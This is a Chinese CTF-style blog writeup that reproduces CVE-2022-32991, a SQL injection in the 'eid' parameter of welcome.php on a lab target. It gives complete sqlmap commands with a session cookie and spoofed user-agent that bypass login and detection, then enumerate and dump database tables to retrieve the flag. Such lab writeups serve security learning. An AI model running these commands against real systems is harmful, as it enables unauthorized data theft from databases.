CVE-2022-32991 漏洞复现

目录

一些资料

工具

题解

 sqlmap

解1: 只用cookie和ua头

 解2:保存读取所有http header信息

每日emo


一些资料

NVD - CVE-2022-32991 (nist.gov)

在welcome.php页面存在sql注入,注入点参数为eid

工具

  • sqlmap
  • Burpsuite

题解

打开靶场,有登录和注册选项

注册一个账号并登录

 观察该url知道,是我们要找的welcome.php界面,但是参数不是我们想找的eid,继续寻找

 在点击第一个start之后

 找到了我们要的welcome.php和eid 

burp抓包看看

 sqlmap

参考:sqlmap使用教程(超详细)_Redmaple925的博客-CSDN博客_sqlmap使用教程 详细介绍了sqlmap用法

解1: 只用cookie和ua头

因为要绕过用户登录检测和对sqlmap攻击的检测,通过cookie和ua头来绕过

记录Sqlmap攻击所需的HTTP头部请求参数:

cookie:PHPSESSID=1iudqcpog1tnej5midsic2rjs4

user-agent :Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

sqlmap命令语句

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch --dbs

命令解释:

-u    =>  指定要攻击的url

-p      指定注入点参数

--user-agent    指定ua头

--cookie        指定cookie

--batch           默认确认(y)

--dbs          爆破所有数据库(databases缩写)

 爆库:

 爆表:

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf --tables

 爆字段:

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf -T flag --columns

 读数据:

sqlmap -u "http://eci-2zedkd5o75r8qj5ch710.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" --cookie="PHPSESSID=1iudqcpog1tnej5midsic2rjs4" --batch -D ctf -T flag -C flag --dump

 

 解2:保存读取所有http header信息

*号标记注入点

 sqlmap:

sqlmap -r /home/kali/桌面/6.txt -batch --dbs
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf --tables
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf -T flag --columns
sqlmap -r /home/kali/桌面/6.txt -batch -D ctf -T flag -C flag --dump

操作和上面一样,不过方便许多

每日emo

温柔扑了个空才长记性。
相信我们的缘分就是从你双击屏幕开始的

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值